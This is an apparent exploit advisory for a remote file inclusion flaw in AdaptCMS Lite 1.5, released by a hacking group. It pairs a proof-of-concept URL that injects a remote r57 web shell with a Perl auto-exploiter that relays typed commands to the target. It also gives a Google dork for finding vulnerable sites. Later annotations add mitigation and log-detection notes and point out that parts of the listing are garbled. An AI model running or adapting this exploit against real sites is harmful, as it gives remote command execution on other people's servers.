# Title : AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
# Published : 2009-11-29
# Author : v3n0m
) ) ) ( ( ( ( ( ) )
( /(( /( ( ( /( ( ( ( ) )) ) ) )) ) ) ) ( /( ( /(
)())())) ) )()) ) ) ) (()/(()/( ( (()/(()/((()/( )()) )())
((_)((_)(()/( ((_)((((_)( (((_)(((_)( /(_))(_)) ) /(_))(_))/(_))(_)|((_)
__ ((_)((_)/(_))___ ((_) _ ) )___) _ )(_))(_))_ ((_)(_))(_)) (_)) _((_)_ ((_)
/ / _ (_)) __ / (_)_(_)(/ __(_)_(_) _ | | __| _ | |_ _|| | | |/ /
V / (_) || (_ | V / / _ | (__ / _ | /| |) | _|| / |__ | | | .` | ' <
|_| ___/ ___| |_| /_/ _ ___/_/ _|_|_|___/|___|_|_____|___||_|_|_|_
[+] AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability
[-] Author : v3n0m
[-] Contact : v3n0m666[at]live[dot]com
[-] Blog : http://v3n0m.blogdetik.com/
[-] Group : YOGYACARDERLINK
[-] Site : http://yogyacarderlink.web.id/
[-] Date : November, 26-2009 [INDONESIA]
[!] Application : AdaptCMS Lite
[!] Vendor : www.insanevisions.com
[!] Version : 1.5 (other versions may also be affected)
[!] Download : http://sourceforge.net/projects/adaptcms/files/
[!] License : Free
[!] Vulnerable : Remote File Inclusion
[!] Google Dork : Copyright 2006-2009 Insane Visions
[o] Description
AdaptCMS is a PHP CMS made for complete control of your website,
ease of use and easy adaptation to any type of website.
It's made easy with advanced custom fields,
a very simple but powerful template system and much more.
Vuln Code & PoC
***************
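Vuln: include_once($sitepath."includes/rss/simplepie.inc");
Note: the PoC implies $sitepath is not initialised when plugins/rss_importer_functions.php is requested directly, so with register_globals = on a request parameter can set it, and with allow_url_include = on include_once() will fetch and run a remote URL. Mitigation: build the include path from a constant defined inside the application, refuse direct requests to files under plugins/, and keep register_globals and allow_url_include off.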
PoC : http://server/plugins/rss_importer_functions.php?sitepath=http://localhost/r57.txt??
AdaptCMS Lite Auto Exploiter
****************************
#!/usr/bin/perl -w
##################################################################
# Created by v3n0m #
# sHoutz: lingah,IdioT_InsidE,LeQhi,aRiee,z0mb13,m4rco,NaZmy, #
# eidelweiss,JaLi-,Anak_Naga_,g0nz,mywisdom,setanmuda, #
# yoga0400,ripper_maya,elv1n4,badkiddies,dhit_coxon, #
# psychotic_girl,jo8928,r4f43l_world,angela zhang #
# & All YOGYACARDERLINK Crew #
# #
# - register_globals = on #
# - allow_url_include = on #
# - allow_url_fopen = on #
##################################################################
use LWP::UserAgent;
use HTTP::Request;
use LWP::Simple;
use Getopt::Long;
# Wipe the terminal with the platform's own command: 'cls' on Windows,
# 'clear' everywhere else. Returns whatever system() returns.
sub clear {
    my $wipe_cmd = 'clear';
    $wipe_cmd = 'cls' if $^O eq 'MSWin32';
    return system($wipe_cmd);
}
# Start with an empty terminal before anything is printed.
clear();
# Clear the screen, print the tool banner and the usage line, then exit.
# Called when a required option is missing; it never returns to the caller.
# NOTE(review): the listing looks damaged by extraction ("n" stands where a
# newline escape is expected, and the usage line carries bare inner quotes),
# so the block does not parse as shown.
sub banner {
&clear();
print "|---------------------------------------------|n";
print "| AdaptCMS Lite RFI Auto Injector |n";
print "| Created : v3n0m |n";
print "| E-mail : v3n0m666[at]live[dot]com |n";
print "| |n";
print "| |n";
print "| www.yogyacarderlink.web.id |n";
print "|---------------------------------------------|nn";
print "Usage:n";
# Usage: -u is the base URL of the AdaptCMS install, -fuck the URL of the
# remote file handed to the vulnerable include.
print " perl $0 -u "http://target/[path]/" -fuck "http://localhost/r57.txt??"nn";
exit();
}
# Declare the command-line options (help, u, fuck) with Getopt::Long, then
# show the usage banner and exit unless both $u and $fuck are set.
# Per the usage text, $u is the base URL of the AdaptCMS install and $fuck is
# the URL of the remote file to be included.
# NOTE(review): neither value is validated; both are concatenated straight
# into the request URL further down.
my $options = GetOptions (
'help!' => $help,
'u=s' => $u,
'fuck=s' => $fuck
);
&banner unless ($u);
&banner unless ($fuck);
# Strip a trailing newline, if any, from both values.
chomp($u);
chomp($fuck);
# Interactive loop: reads one line from STDIN per iteration and sends it to
# the target inside a single GET request; "exit" or "quit" ends the script.
# The request goes to /plugins/rss_importer_functions.php under the -u base
# URL, with sitepath set to the -fuck URL followed by the act/cmd/d/submit/
# cmd_txt parameters built below.
# NOTE(review): those extra parameters are presumably consumed by the remotely
# included script (the PoC names r57.txt), not by AdaptCMS itself - confirm.
# Defender view: in web-server logs this appears as requests to
# plugins/rss_importer_functions.php carrying a sitepath= parameter that holds
# an absolute URL. LWP::UserAgent is created with no options, so the default
# libwww-perl User-Agent is sent. The attack also needs the web server to make
# an outbound HTTP fetch, so egress filtering and allow_url_include = Off each
# break the chain.
while (){
print "[shell]:~$ ";
chomp($cmd=<STDIN>);
if ($cmd eq "exit" || $cmd eq "quit") {
exit 0;
}
my $ua = LWP::UserAgent->new;
# Operator input is appended as-is, with no URL encoding.
$iny="?&act=cmd&cmd=" . $cmd . "&d=/&submit=1&cmd_txt=1";
chomp($iny);
my $own = $u . "/plugins/rss_importer_functions.php?sitepath=" . $fuck . $iny;
chomp($own);
my $req = HTTP::Request->new(GET => $own);
my $res = $ua->request($req);
my $con = $res->content;
if ($res->is_success){
# On a successful response, print the first capture: the text that follows
# "readonly> " up to the closing textarea tag in the returned page.
# NOTE(review): the pattern does not parse as shown (extraction damage).
print $1,"n" if ( $con =~ m/readonly> (.*?)</textarea>/mosix);
}
else
{
# Any non-success HTTP status ends the session with exit code 1.
print "Exploiting failed !!n";
exit(1);
}
}